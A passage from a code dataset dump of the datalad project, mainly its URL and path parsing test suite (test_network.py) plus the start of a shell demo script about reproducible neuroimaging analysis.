% url)\n\n if not all_versions:\n # we didn't get a chance\n all_versions = [url_rec.as_str()]\n\n if return_all:\n return all_versions\n else:\n return all_versions[0]\n\n\nif __name__ == '__main__':\n import sys\n lgr.setLevel(logging.INFO)\n # TODO: proper cmdline\n if len(sys.argv) > 1 and sys.argv[1] == \"generate\":\n if len(sys.argv) < 3:\n raise ValueError(\"Say 'all' to regenerate all, or give a generators name\")\n name = sys.argv[2]\n if name.lower() == 'all':\n for f in locals().keys():\n if f.startswith('gen_bucket_'):\n locals()[f]()\n else:\n locals()['gen_bucket_%s' % name]()\n else:\n print(\"nothing todo\")\n" }, { "alpha_fraction": 0.5759270787239075, "alphanum_fraction": 0.5970732569694519, "avg_line_length": 39.59720230102539, "blob_id": "5169a78c2efe47fc6416415b5bd1e992fe5bfd82", "content_id": "a64df33fd30f98e8bc32e9cb90d9a6425dcf7b98", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26104, "license_type": "permissive", "max_line_length": 146, "num_lines": 643, "path": "/datalad/support/tests/test_network.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport os\nimport tempfile\nfrom os.path import isabs\nfrom os.path import join as opj\n\nimport pytest\n\nimport datalad.support.network\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.network import (\n RI,\n SSHRI,\n URL,\n DataLadRI,\n GitTransportRI,\n PathRI,\n _split_colon,\n dlurljoin,\n get_local_file_url,\n get_response_disposition_filename,\n get_tld,\n get_url_straight_filename,\n is_datalad_compat_ri,\n is_ssh,\n is_url,\n iso8601_to_epoch,\n local_path_representation,\n local_path2url_path,\n local_url_path_representation,\n parse_url_opts,\n quote_path,\n same_website,\n urlquote,\n url_path2local_path,\n)\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_in,\n assert_raises,\n assert_status,\n eq_,\n get_most_obscure_supported_name,\n known_failure_githubci_win,\n neq_,\n nok_,\n ok_,\n skip_if,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n PurePosixPath,\n on_windows,\n)\n\n\ndef test_same_website():\n ok_(same_website(\"http://a.b\", \"http://a.b/2014/01/xxx/\"))\n ok_(same_website(\"http://a.b/page/2/\", \"http://a.b/2014/01/xxx/\"))\n ok_(same_website(\"https://a.b/page/2/\", \"http://a.b/2014/01/xxx/\"))\n ok_(same_website(\"http://a.b/page/2/\", \"https://a.b/2014/01/xxx/\"))\n\n\ndef test_get_tld():\n eq_(get_tld('http://example.com'), 'example.com')\n eq_(get_tld('http://example.com/1'), 'example.com')\n eq_(get_tld('http://example.com/1/2'), 'example.com')\n eq_(get_tld('example.com/1/2'), 'example.com')\n eq_(get_tld('s3://example.com/1/2'), 'example.com')\n assert_raises(ValueError, get_tld, \"\")\n assert_raises(ValueError, get_tld, \"s3://\")\n assert_raises(ValueError, get_tld, \"http://\")\n\ndef test_dlurljoin():\n eq_(dlurljoin('http://a.b/', 'f'), 'http://a.b/f')\n eq_(dlurljoin('http://a.b/page', 'f'), 'http://a.b/f')\n eq_(dlurljoin('http://a.b/dir/', 'f'), 'http://a.b/dir/f')\n eq_(dlurljoin('http://a.b/dir/', 'http://url'), 'http://url')\n eq_(dlurljoin('http://a.b/dir/', '/'), 'http://a.b/')\n eq_(dlurljoin('http://a.b/dir/', '/x/y'), 'http://a.b/x/y')\n\[email protected](\"suf\", [\n '',\n '#',\n '#tag',\n '#tag/obscure',\n '?param=1',\n '?param=1&another=/',\n])\ndef test_get_url_straight_filename(suf):\n eq_(get_url_straight_filename('http://a.b/' + suf), '')\n eq_(get_url_straight_filename('http://a.b/p1' + suf), 'p1')\n eq_(get_url_straight_filename('http://a.b/p1/' + suf), '')\n eq_(get_url_straight_filename('http://a.b/p1/' + suf, allowdir=True), 'p1')\n eq_(get_url_straight_filename('http://a.b/p1/p2' + suf), 'p2')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf), '')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf, allowdir=True), 'p2')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf, allowdir=True, strip=('p2', 'xxx')), 'p1')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf, strip=('p2', 'xxx')), '')\n\nfrom ..network import rfc2822_to_epoch\n\n\ndef test_rfc2822_to_epoch():\n eq_(rfc2822_to_epoch(\"Thu, 16 Oct 2014 01:16:17 EDT\"), 1413436577)\n\n\ndef test_get_response_disposition_filename():\n eq_(get_response_disposition_filename('attachment;filename=\"Part1-Subjects1-99.tar\"'), \"Part1-Subjects1-99.tar\")\n eq_(get_response_disposition_filename('attachment'), None)\n\n\ndef test_parse_url_opts():\n url = 'http://map.org/api/download/?id=157'\n output = parse_url_opts(url)\n eq_(output, ('http://map.org/api/download/', {'id': '157'}))\n\n url = 's3://bucket/save/?key=891'\n output = parse_url_opts(url)\n eq_(output, ('s3://bucket/save/', {'key': '891'}))\n\n url = 'http://map.org/api/download/?id=98&code=13'\n output = parse_url_opts(url)\n eq_(output, ('http://map.org/api/download/', {'id': '98', 'code': '13'}))\n\n\ndef test_split_colon():\n eq_(_split_colon('a:b'), ['a', 'b'])\n eq_(_split_colon('a:b:c'), ['a', 'b:c'])\n eq_(_split_colon('a:b:c', 2), ['a', 'b', 'c'])\n eq_(_split_colon('ab'), ['ab'])\n eq_(_split_colon(r'a\\:b'), [r'a\\:b'])\n\n\ndef test_url_eq():\n assert URL() == URL()\n # doesn't make sense to ask what kind of a url it is an empty URL\n assert URL() != URL(hostname='x')\n # Different types aren't equal even if have the same fields values\n assert URL(path='x') != PathRI(path='x')\n assert URL(hostname='x') != SSHRI(hostname='x')\n assert str(URL(hostname='x')) != str(SSHRI(hostname='x'))\n\n\ndef _check_ri(ri, cls, exact_str=True, localpath=None, **fields):\n \"\"\"just a helper to carry out few checks on urls\"\"\"\n with swallow_logs(new_level=logging.DEBUG) as cml:\n ri_ = cls(**fields)\n murl = RI(ri)\n assert murl.__class__ == cls # not just a subclass\n assert murl == ri_\n if isinstance(ri, str):\n assert str(RI(ri)) == ri\n assert eval(repr(ri_)) == ri # repr leads back to identical ri_\n assert ri == ri_ # just in case ;) above should fail first if smth is wrong\n if not exact_str:\n assert_in('Parsed version of', cml.out)\n if exact_str:\n assert str(ri) == str(ri_)\n else:\n assert str(ri) != str(ri_)\n\n # and that we have access to all those fields\n nok_(set(fields).difference(set(cls._FIELDS)))\n for f, v in fields.items():\n assert getattr(ri_, f) == v\n\n if localpath:\n if cls == URL:\n local_representation = local_url_path_representation(localpath)\n else:\n local_representation = local_path_representation(localpath)\n assert ri_.localpath == local_representation\n old_localpath = ri_.localpath # for a test below\n else:\n # if not given -- must be a remote url, should raise exception on\n # non-Windows systems. But not on Windows systems because we allow UNCs\n # to be encoded in URLs\n if not on_windows:\n with assert_raises(ValueError):\n ri_.localpath\n\n # This one does not have a path. TODO: either proxy path from its .RI or adjust\n # hierarchy of classes to make it more explicit\n if cls == GitTransportRI:\n return\n # do changes in the path persist?\n old_str = str(ri_)\n ri_.path = newpath = opj(ri_.path, 'sub')\n assert ri_.path == newpath\n assert str(ri_) != old_str\n if localpath:\n assert ri_.localpath == local_path_representation(opj(old_localpath, 'sub'))\n\n\ndef test_url_base():\n # Basic checks\n assert_raises(ValueError, URL, \"http://example.com\", hostname='example.com')\n url = URL(\"http://example.com\")\n eq_(url.hostname, 'example.com')\n eq_(url.scheme, 'http')\n eq_(url.port, '') # not specified -- empty strings\n eq_(url.username, '') # not specified -- empty strings\n eq_(repr(url), \"URL(hostname='example.com', netloc='example.com', scheme='http')\")\n eq_(url, \"http://example.com\") # automagic coercion in __eq__\n\n neq_(URL(), URL(hostname='x'))\n\n smth = URL('smth')\n eq_(smth.hostname, '')\n ok_(bool(smth))\n nok_(bool(URL()))\n\n assert_raises(ValueError, url._set_from_fields, unknown='1')\n\n with swallow_logs(new_level=logging.WARNING) as cml:\n # we don't \"care\" about params ATM so there is a warning if there are any\n purl = URL(\"http://example.com/;param\")\n eq_(str(purl), 'http://example.com/;param') # but we do maintain original string\n assert_in('ParseResults contains params', cml.out)\n eq_(purl.as_str(), 'http://example.com/')\n\n\n@with_tempfile\ndef test_pathri_guessing(filename=None):\n # Complaining about ;param only at DEBUG level\n # see https://github.com/datalad/datalad/issues/6872\n with swallow_logs(new_level=logging.DEBUG) as cml:\n # we don't \"care\" about params ATM so there is a warning if there are any\n ri = RI(f\"{filename};param\")\n assert isinstance(ri, PathRI)\n if not on_windows:\n # Does not happen on Windows since paths with \\ instead of / do not\n # look like possible URLs\n assert_in('ParseResults contains params', cml.out)\n\n\n@skip_if(not on_windows)\ndef test_pathri_windows_anchor():\n assert RI('file:///c:/Windows').localpath == 'C:\\\\Windows'\n\n\n@known_failure_githubci_win\ndef test_url_samples():\n _check_ri(\"http://example.com\", URL, scheme='http', hostname=\"example.com\", netloc='example.com')\n # \"complete\" one for classical http\n _check_ri(\"http://user:[email protected]:8080/p/sp?p1=v1&p2=v2#frag\", URL,\n scheme='http', netloc='user:[email protected]:8080',\n hostname=\"example.com\", port=8080, username='user', password='pw',\n path='/p/sp', query='p1=v1&p2=v2', fragment='frag')\n\n # sample one for ssh with specifying the scheme\n # XXX? might be useful? https://github.com/FriendCode/giturlparse.py\n _check_ri(\"ssh://host/path/sp1\", URL, scheme='ssh', hostname='host',\n netloc='host', path='/path/sp1')\n _check_ri(\"user@host:path/sp1\", SSHRI,\n hostname='host', path='path/sp1', username='user')\n _check_ri(\"host:path/sp1\", SSHRI, hostname='host', path='path/sp1')\n _check_ri(\"host:path\", SSHRI, hostname='host', path='path')\n _check_ri(\"host:/path\", SSHRI, hostname='host', path='/path')\n _check_ri(\"user@host\", SSHRI, hostname='host', username='user')\n # TODO!!! should this be a legit URL like this?\n # _check_ri(\"host\", SSHRI, hostname='host'))\n eq_(repr(RI(\"host:path\")), \"SSHRI(hostname='host', path='path')\")\n\n # And now perspective 'datalad', implicit=True urls pointing to the canonical center location\n _check_ri(\"///\", DataLadRI)\n _check_ri(\"///p/s1\", DataLadRI, path='p/s1')\n # could be considered by someone as \"URI reference\" relative to scheme\n _check_ri(\"//a/\", DataLadRI, remote='a')\n _check_ri(\"//a/data\", DataLadRI, path='data', remote='a')\n\n # here we will do custom magic allowing only schemes with + in them, such as dl+archive\n # or not so custom as\n _check_ri(\"hg+https://host/user/proj\", URL, scheme=\"hg+https\",\n netloc='host', hostname='host', path='/user/proj')\n # \"old\" style\n _check_ri(\"dl+archive:KEY/path/sp1#size=123\", URL,\n scheme='dl+archive', path='KEY/path/sp1', fragment='size=123')\n # \"new\" style\n _check_ri(\"dl+archive:KEY#path=path/sp1&size=123\", URL,\n scheme='dl+archive', path='KEY', fragment='path=path/sp1&size=123')\n # actually above one is probably wrong since we need to encode the path\n _check_ri(\"dl+archive:KEY#path=path%2Fbsp1&size=123\", URL,\n scheme='dl+archive', path='KEY', fragment='path=path%2Fbsp1&size=123')\n\n #https://en.wikipedia.org/wiki/File_URI_scheme\n _check_ri(\"file://host\", URL, scheme='file', netloc='host', hostname='host')\n _check_ri(\"file://host/path/sp1\", URL, scheme='file', netloc='host',\n hostname='host', path='/path/sp1')\n # stock libraries of Python aren't quite ready for ipv6\n ipv6address = '2001:db8:85a3::8a2e:370:7334'\n _check_ri(\"file://%s/path/sp1\" % ipv6address, URL,\n scheme='file', netloc=ipv6address, hostname=ipv6address,\n path='/path/sp1')\n for lh in ('localhost', '::1', '', '127.3.4.155'):\n if on_windows:\n url = RI(f\"file://{lh}/path/sp1\")\n assert url.localpath == f'\\\\\\\\{lh}\\\\path\\\\sp1' if lh else '\\\\path\\\\sp1'\n else:\n _check_ri(\"file://%s/path/sp1\" % lh, URL, localpath='/path/sp1',\n scheme='file', netloc=lh, hostname=lh, path='/path/sp1')\n\n _check_ri('http://[1fff:0:a88:85a3::ac1f]:8001/index.html', URL,\n scheme='http', netloc='[1fff:0:a88:85a3::ac1f]:8001',\n hostname='1fff:0:a88:85a3::ac1f', port=8001, path='/index.html')\n _check_ri(\"file:///path/sp1\", URL, localpath='/path/sp1', scheme='file', path='/path/sp1')\n # we don't do any magical comprehension for home paths/drives for windows\n # of file:// urls, thus leaving /~ and /c: for now:\n _check_ri(\"file:///~/path/sp1\", URL, localpath='/~/path/sp1', scheme='file', path='/~/path/sp1')\n _check_ri(\"file:///%7E/path/sp1\", URL, localpath='/~/path/sp1', scheme='file', path='/~/path/sp1', exact_str=False)\n # not sure but let's check\n if on_windows:\n _check_ri(\"file:///C:/path/sp1\", URL, localpath='C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n _check_ri(\"file:/C:/path/sp1\", URL, localpath='C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n # git-annex style drive-letter encoding\n _check_ri(\"file://C:/path/sp1\", URL, netloc=\"C:\", hostname=\"c\", localpath='C:/path/sp1', scheme='file', path='/path/sp1', exact_str=False)\n else:\n _check_ri(\"file:///C:/path/sp1\", URL, localpath='/C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n _check_ri(\"file:/C:/path/sp1\", URL, localpath='/C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n\n # and now implicit paths or actually they are also \"URI references\"\n _check_ri(\"f\", PathRI, localpath='f', path='f')\n _check_ri(\"f/s1\", PathRI, localpath='f/s1', path='f/s1')\n _check_ri(PurePosixPath(\"f\"), PathRI, localpath='f', path='f')\n _check_ri(PurePosixPath(\"f/s1\"), PathRI, localpath='f/s1', path='f/s1')\n # colons are problematic and might cause confusion into SSHRI\n _check_ri(\"f/s:1\", PathRI, localpath='f/s:1', path='f/s:1')\n _check_ri(\"f/s:\", PathRI, localpath='f/s:', path='f/s:')\n _check_ri(\"/f\", PathRI, localpath='/f', path='/f')\n _check_ri(\"/f/s1\", PathRI, localpath='/f/s1', path='/f/s1')\n\n # some github ones, just to make sure\n _check_ri(\"git://host/user/proj\", URL, scheme=\"git\", netloc=\"host\",\n hostname=\"host\", path=\"/user/proj\")\n _check_ri(\"git@host:user/proj\", SSHRI, hostname=\"host\", path=\"user/proj\", username='git')\n\n _check_ri('weird:/', SSHRI, hostname='weird', path='/')\n # since schema is not allowing some symbols so we need to add additional check\n _check_ri('weird_url:/', SSHRI, hostname='weird_url', path='/')\n _check_ri('example.com:/', SSHRI, hostname='example.com', path='/')\n _check_ri('example.com:path/sp1', SSHRI, hostname='example.com', path='path/sp1')\n _check_ri('example.com/path/sp1\\\\:fname', PathRI, localpath='example.com/path/sp1\\\\:fname',\n path='example.com/path/sp1\\\\:fname')\n # ssh is as stupid as us, so we will stay \"Consistently\" dumb\n \"\"\"\n $> ssh example.com/path/sp1:fname\n ssh: Could not resolve hostname example.com/path/sp1:fname: Name or service not known\n\n edit 20190516 yoh: but this looks like a perfectly valid path.\n SSH knows that it is not a path but its SSHRI so it can stay dumb.\n We are trying to be smart and choose between RIs (even when we know that\n it is e.g. a file).\n \"\"\"\n _check_ri('e.com/p/sp:f', PathRI, localpath='e.com/p/sp:f', path='e.com/p/sp:f')\n _check_ri('[email protected]/mydir', PathRI, localpath='[email protected]/mydir', path='[email protected]/mydir')\n\n # SSHRIs have .port, but it is empty\n eq_(SSHRI(hostname='example.com').port, '')\n\n # check that we are getting a warning logged when url can't be reconstructed\n # precisely\n # actually failed to come up with one -- becomes late here\n #_check_ri(\"http://host///..//p\", scheme='http', path='/..//p')\n\n # actually this one is good enough to trigger a warning and I still don't know\n # what it should exactly be!?\n with swallow_logs(new_level=logging.DEBUG) as cml:\n weird_str = 'weird://'\n weird_url = RI(weird_str)\n repr(weird_url)\n cml.assert_logged(\n 'Parsed version of SSHRI .weird:/. '\n 'differs from original .weird://.'\n )\n # but we store original str\n eq_(str(weird_url), weird_str)\n neq_(weird_url.as_str(), weird_str)\n\n raise SkipTest(\"TODO: file://::1/some does complain about parsed version dropping ::1\")\n\n\ndef test_git_transport_ri():\n _check_ri(\"gcrypt::http://somewhere\", GitTransportRI, RI='http://somewhere', transport='gcrypt')\n # man git-push says\n # <transport>::<address>\n # where <address> may be a path, a server and path, or an arbitrary URL-like string...\n # so full path to my.com/... should be ok?\n _check_ri(\"http::/my.com/some/path\", GitTransportRI, RI='/my.com/some/path', transport='http')\n # some ssh server. And we allow for some additional chars in transport.\n # Git doesn't define since it does not care! we will then be flexible too\n _check_ri(\"trans-port::server:path\", GitTransportRI, RI='server:path', transport='trans-port')\n\n\[email protected](\"cls,clskwargs,target_url\", [\n (SSHRI, {}, r'example.com:/ \"' + r\"';a&b&cd `| \"),\n (URL, {'scheme': \"http\"}, 'http://example.com/%20%22%27%3Ba%26b%26cd%20%60%7C%20'),\n (PathRI, {}, r'/ \"' + r\"';a&b&cd `| \"), # nothing is done to file:implicit\n])\ndef test_url_quote_path(cls, clskwargs, target_url):\n path = '/ \"\\';a&b&cd `| '\n if not (cls is PathRI):\n clskwargs['hostname'] = hostname = 'example.com'\n url = cls(path=path, **clskwargs)\n eq_(url.path, path)\n if 'hostname' in clskwargs:\n eq_(url.hostname, hostname)\n # all nasty symbols should be quoted\n url_str = str(url)\n eq_(url_str, target_url)\n # no side-effects:\n eq_(url.path, path)\n if 'hostname' in clskwargs:\n eq_(url.hostname, hostname)\n\n # and figured out and unquoted\n url_ = RI(url_str)\n ok_(isinstance(url_, cls))\n eq_(url_.path, path)\n if 'hostname' in clskwargs:\n eq_(url.hostname, hostname)\n\n\ndef test_url_compose_archive_one():\n url = URL(scheme='dl+archive', path='KEY',\n fragment=dict((('path', 'f/p/ s+'), ('size', 30))))\n # funny - space is encoded as + but + is %2B\n eq_(str(url), 'dl+archive:KEY#path=f/p/+s%2B&size=30')\n eq_(url.fragment_dict, {'path': 'f/p/ s+', 'size': '30'})\n\n\ndef test_url_fragments_and_query():\n url = URL(hostname=\"host\", query=dict((('a', 'x/b'), ('b', 'y'))))\n eq_(str(url), '//host?a=x%2Fb&b=y')\n eq_(url.query, 'a=x%2Fb&b=y')\n eq_(url.query_dict, {'a': 'x/b', 'b': 'y'})\n\n url = URL(hostname=\"host\", fragment=dict((('b', 'x/b'), ('a', 'y'))))\n eq_(str(url), '//host#b=x/b&a=y')\n eq_(url.fragment, 'b=x/b&a=y')\n eq_(url.fragment_dict, {'a': 'y', 'b': 'x/b'})\n\n fname = get_most_obscure_supported_name()\n url = URL(hostname=\"host\", fragment={'a': fname})\n eq_(url.fragment_dict, {'a': fname})\n\n\ndef test_url_dicts():\n eq_(URL(\"http://host\").query_dict, {})\n\n\ndef test_get_url_path_on_fileurls():\n assert URL('file:///a').path == '/a'\n assert URL('file:///a/b').path == '/a/b'\n assert URL('file:///a/b').localpath == local_path_representation('/a/b')\n assert URL('file:///a/b#id').path == '/a/b'\n assert URL('file:///a/b?whatever').path == '/a/b'\n\n\ndef test_is_url():\n ok_(is_url('file://localhost/some'))\n ok_(is_url('http://localhost'))\n ok_(is_url('ssh://me@localhost'))\n # in current understanding it is indeed a url but an 'ssh', implicit=True, not just\n # a useless scheme=weird with a hope to point to a netloc\n with swallow_logs():\n ok_(is_url('weird://'))\n nok_(is_url('relative'))\n nok_(is_url('/absolute'))\n ok_(is_url('like@sshlogin')) # actually we do allow ssh:implicit urls ATM\n nok_(is_url(''))\n nok_(is_url(' '))\n nok_(is_url(123)) # stuff of other types wouldn't be considered a URL\n\n # we can pass RI instance directly\n ok_(is_url(RI('file://localhost/some')))\n nok_(is_url(RI('relative')))\n\n\n# TODO: RF with test_is_url to avoid duplication\ndef test_is_datalad_compat_ri():\n ok_(is_datalad_compat_ri('ssh://user:passw@host/path'))\n ok_(is_datalad_compat_ri('http://example.com'))\n ok_(is_datalad_compat_ri('file://localhost/some'))\n ok_(is_datalad_compat_ri('///localhost/some'))\n nok_(is_datalad_compat_ri('relative'))\n nok_(is_datalad_compat_ri('.///localhost/some'))\n nok_(is_datalad_compat_ri(123))\n\n\ndef test_get_local_file_url():\n compat_annex = 'git-annex'\n compat_git = 'git'\n for path, url, compatibility in (\n # relpaths are special-cased below\n ('test.txt', 'test.txt', compat_annex),\n (OBSCURE_FILENAME, urlquote(OBSCURE_FILENAME), compat_annex),\n ) + ((\n ('C:\\\\Windows\\\\notepad.exe', 'file://C:/Windows/notepad.exe', compat_annex),\n ('C:\\\\Windows\\\\notepad.exe', 'file:///C:/Windows/notepad.exe', compat_git),\n ) if on_windows else (\n ('/a', 'file:///a', compat_annex),\n ('/a/b/c', 'file:///a/b/c', compat_annex),\n ('/a~', 'file:///a~', compat_annex),\n # there are no files with trailing slashes in the name\n #('/a b/', 'file:///a%20b/'),\n ('/a b/name', 'file:///a%20b/name', compat_annex),\n )):\n # Yarik found no better way to trigger. .decode() isn't enough\n print(\"D: %s\" % path)\n if isabs(path):\n assert get_local_file_url(path, compatibility=compatibility) == url\n abs_path = path\n else:\n assert get_local_file_url(path, allow_relative_path=True, compatibility=compatibility) \\\n == '/'.join((get_local_file_url(os.getcwd(), compatibility=compatibility), url))\n abs_path = opj(os.getcwd(), path)\n if compatibility == compat_git:\n assert get_local_file_url(abs_path, compatibility=compatibility) == Path(abs_path).as_uri()\n\n\n@with_tempfile(mkdir=True)\ndef test_get_local_file_url_compatibility(path=None):\n # smoke test for file:// URL compatibility with other datalad/git/annex\n # pieces\n path = Path(path)\n ds1 = Dataset(path / 'ds1').create()\n ds2 = Dataset(path / 'ds2').create()\n testfile = path / 'testfile.txt'\n testfile.write_text('some')\n\n # compat with annex addurl\n ds1.repo.add_url_to_file(\n 'test.txt',\n get_local_file_url(str(testfile), compatibility='git-annex'))\n\n # compat with git clone/submodule\n assert_status(\n 'ok',\n ds1.clone(get_local_file_url(ds2.path, compatibility='git'),\n result_xfm=None, return_type='generator'))\n\n\ndef test_is_ssh():\n\n ssh_locators = [\"ssh://host\",\n \"ssh://host/some/where\",\n \"user@host:path/sp1\",\n \"user@host:/absolute/path/sp1\",\n \"host:path/sp1\",\n \"host:/absolute/path/sp1\",\n \"user@host\"]\n for ri in ssh_locators:\n ok_(is_ssh(ri), \"not considered ssh (string): %s\" % ri)\n ok_(is_ssh(RI(ri)), \"not considered ssh (RI): %s\" % ri)\n\n non_ssh_locators = [\"file://path/to\",\n \"/abs/path\",\n \"../rel/path\",\n \"http://example.com\",\n \"git://host/user/proj\",\n \"s3://bucket/save/?key=891\"]\n for ri in non_ssh_locators:\n ok_(not is_ssh(ri), \"considered ssh (string): %s\" % ri)\n ok_(not is_ssh(RI(ri)), \"considered ssh (RI): %s\" % ri)\n\n\ndef test_iso8601_to_epoch():\n epoch = 1467901515\n eq_(iso8601_to_epoch('2016-07-07T14:25:15+00:00'), epoch)\n eq_(iso8601_to_epoch('2016-07-07T14:25:15+11:00'),\n epoch - 11 * 60 * 60)\n eq_(iso8601_to_epoch('2016-07-07T14:25:15Z'), epoch)\n eq_(iso8601_to_epoch('2016-07-07T14:25:15'), epoch)\n\n eq_(iso8601_to_epoch('2016-07-07T14:25:14'), epoch-1)\n\n\ndef test_mapping_identity():\n from datalad.tests.utils_pytest import OBSCURE_FILENAME\n\n absolute_obscure_path = str(Path('/').absolute() / OBSCURE_FILENAME)\n temp_dir = tempfile.gettempdir()\n print(f\"temp_dir: {temp_dir}\")\n for name in (temp_dir, opj(temp_dir, \"x.txt\"), absolute_obscure_path):\n # On some platforms, e.g. MacOS, `temp_dir` might contain trailing\n # slashes. Since the conversion and its inverse normalize paths, we\n # compare the result to the normalized path\n normalized_name = str(Path(name))\n assert url_path2local_path(local_path2url_path(name)) == normalized_name\n\n prefix = \"/C:\" if on_windows else \"\"\n for name in map(quote_path, (prefix + \"/window\", prefix + \"/d\", prefix + \"/\" + OBSCURE_FILENAME)):\n assert local_path2url_path(url_path2local_path(name)) == name\n\n\ndef test_auto_resolve_path():\n relative_path = str(Path(\"a/b\"))\n with pytest.raises(ValueError):\n local_path2url_path(relative_path)\n local_path2url_path(\"\", allow_relative_path=True)\n\n\n@skip_if(not on_windows)\ndef test_hostname_detection():\n with pytest.raises(ValueError):\n local_path2url_path(\"\\\\\\\\server\\\\share\\\\path\")\n\n\ndef test_url_path2local_path_excceptions():\n with pytest.raises(ValueError):\n url_path2local_path('')\n with pytest.raises(ValueError):\n url_path2local_path(None)\n with pytest.raises(ValueError):\n url_path2local_path('a/b')\n with pytest.raises(ValueError):\n url_path2local_path(PurePosixPath('a/b'))\n with pytest.raises(ValueError):\n url_path2local_path(PurePosixPath('//a/b'))\n\n\ndef test_quote_path(monkeypatch):\n with monkeypatch.context() as ctx:\n ctx.setattr(datalad.support.network, 'on_windows', True)\n assert quote_path(\"/c:/win:xxx\") == \"/c:/win%3Axxx\"\n assert quote_path(\"/C:/win:xxx\") == \"/C:/win%3Axxx\"\n\n ctx.setattr(datalad.support.network, 'on_windows', False)\n assert quote_path(\"/c:/win:xxx\") == \"/c%3A/win%3Axxx\"\n assert quote_path(\"/C:/win:xxx\") == \"/C%3A/win%3Axxx\"\n" }, { "alpha_fraction": 0.7521818280220032, "alphanum_fraction": 0.7596914768218994, "avg_line_length": 56.96470642089844, "blob_id": "9a61960f2ea7f0d0bcd40f4eb5c750c7e2361b32", "content_id": "44907aa45ce5a85e24dca1c4452cd92dbba318d7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4927, "license_type": "permissive", "max_line_length": 276, "num_lines": 85, "path": "/docs/casts/reproducible_analysis.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"Scientific studies should be reproducible, and with the increasing accessibility of data, there is not much excuse for lack of reproducibility anymore.\"\nsay \"DataLad can help with the technical aspects of reproducible science...\"\nsay \"It always starts with a dataset\"\nrun \"datalad create demo\"\nrun \"cd demo\"\n\nsay \"For this demo we are using two public brain imaging datasets that were published on OpenFMRI.org, and are available from DataLad's datasets.datalad.org\"\nrun \"datalad install -d . -s ///openfmri/ds000001 inputs/ds000001\"\n\nsay \"BTW: '///' is just short for https://datasets.datalad.org\"\n\nrun \"datalad install -d . -s ///openfmri/ds000002 inputs/ds000002\"\n\nsay \"Both datasets are now registered as subdatasets, and their precise versions are on record\"\nrun \"datalad --output-format '{path}: {revision_descr}' subdatasets\"\n\nsay \"However, very little data were actually downloaded (the full datasets are several gigabytes in size):\"\nrun \"du -sh inputs/\"\n\nsay \"DataLad datasets are fairly lightweight in size, they only contain pointers to data and history information in their minimal form.\"\n\nsay \"Both datasets contain brain imaging data, and are compliant with the BIDS standard. This makes it really easy to locate particular images and perform analysis across datasets.\"\nsay \"Here we will use a small script that performs 'brain extraction' using FSL as a stand-in for a full analysis pipeline\"\nrun \"mkdir code\"\nrun \"cat << EOT > code/brain_extraction.sh\n# enable FSL\n. /etc/fsl/5.0/fsl.sh\n\n# obtain all inputs\ndatalad get \\\\\\$@\n# perform brain extraction\ncount=1\nfor nifti in \\\\\\$@; do\n subdir=\\\"sub-\\\\\\$(printf %03d \\\\\\$count)\\\"\n mkdir -p \\\\\\$subdir\n echo \\\"Processing \\\\\\$nifti\\\"\n bet \\\\\\$nifti \\\\\\$subdir/anat -m\n count=\\\\\\$((count + 1)) \ndone\nEOT\"\n\nsay \"Note that this script uses the 'datalad get' command which automatically obtains the required files from their remote source -- we will see this in action shortly\"\nsay \"We are saving this script in the dataset. This way we will know exactly which code was used for the analysis. Also, we track this code file with Git, so we can see more easily how it was edited over time.\"\nrun \"datalad save code -m \\\"Brain extraction script\\\" --to-git\"\n\nsay \"In addition, we will \\\"tag\\\" this state of the dataset. This is optional, but it can help to identify important milestones more easily\"\nrun \"datalad save --version-tag setup_done\"\n\nsay \"Now we can run our analysis code to produce results. However, instead of running it directly, we will run it with DataLad -- this will automatically create a record of exactly how this script was executed\"\nsay \"For this demo we will just run it on the structural images of the first subject from each dataset. The uniform structure of the datasets makes this very easy. Of course we could run it on all subjects; we are simply saving some time for this demo.\"\nsay \"While the command runs, you should notice a few things:\"\nsay \"1) We run this command with 'bash -e' to stop at any failure that may occur\"\nsay \"2) You'll see the required data files being obtained as they are needed -- and only those that are actually required will be downloaded\"\nrun \"datalad run bash -e code/brain_extraction.sh inputs/ds*/sub-01/anat/sub-01_T1w.nii.gz\"\n\nsay \"The analysis step is done, all generated results were saved in the dataset. All changes, including the command that caused them are on record\"\nrun \"git show --stat\"\n\nsay \"DataLad has enough information stored to be able to re-run a command.\"\nsay \"On command exit, it will inspect the results and save them again, but only if they are different.\"\nsay \"In our case, the re-run yields bit-identical results, hence nothing new is saved.\"\nrun \"datalad rerun\"\n\nsay \"Now that we are done, and have checked that we can reproduce the results ourselves, we can clean up\"\nsay \"DataLad can easily verify if any part of our input dataset was modified since we configured our analysis\"\nrun \"datalad diff --revision setup_done inputs\"\n\nsay \"Nothing was changed.\"\nsay \"With DataLad with don't have to keep those inputs around -- without losing the ability to reproduce an analysis.\"\nsay \"Let's uninstall them -- checking the size on disk before and after\"\n\nrun \"du -sh\" .\nrun \"datalad uninstall inputs/*\"\nrun \"du -sh .\"\nsay \"All inputs are gone...\"\nrun \"ls inputs/*\"\n\nsay \"Only the remaining data (our code and the results) need to be kept and require a backup for long term archival. Everything else can be re-obtained as needed, when needed.\"\n\nsay \"As DataLad knows everything needed about the inputs, including where to get the right version, we can re-run the analysis with a single command. Watch 